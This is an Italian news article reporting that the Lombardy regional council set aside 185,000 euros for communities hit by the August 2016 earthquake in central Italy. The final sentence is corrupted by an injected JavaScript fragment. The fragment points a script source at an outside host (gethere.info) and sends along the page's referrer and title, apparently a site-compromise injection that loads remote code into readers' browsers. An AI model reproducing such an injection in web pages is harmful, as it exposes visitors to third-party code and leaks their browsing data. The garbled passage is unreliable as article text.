"/>
sabato 18 novembre 2017 22:36:43
omnimilano

Terremoto, dal consiglio regionale destinati 185mila euro alle popolazioni colpite

20 settembre 2016 Politica

Oltre 160 mila euro da destinare alle comunità colpite dal sisma del 24 agosto scorso. E’ il contributo del parlamento lombardo, che ha approvato all’unanimità il documento di iniziativa dell’Ufficio di Presidenza (relatrice la Vice Presidente Sara Valmaggi).
La cifra recuperata dal Consiglio lombardo deriva dai risparmi nel bilancio 2015 e sarà utilizzata per iniziative umanitarie e di soccorso e solidarietà che si concretizzeranno in progetti individuati dalle comunità colpite insieme alla Protezione Civile.
“Si è voluto – ha detto Sara Valmaggi – tradurre il cordoglio e la vicinanza, espressi da subito alle popolazioni di Amatrice, Accumoli e degli altri territori, in un atto concreto di solidarietà che è un dovere per ogni rappresentante delle Istituzioni. E lo si è voluto fare condividendo le modalità d’intervento decise insieme da tutti i Consigli regionali, coordinati dai Presidenti dei Consigli regionali di Abruzzo, Marche, Umbria e Lazio con la Protezione civile”.
Alla cifra andranno poi aggiunti i contributi volontari degli 80 consiglieri regionali, raggiungendo complessivamente la somma di 185 mila euro.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo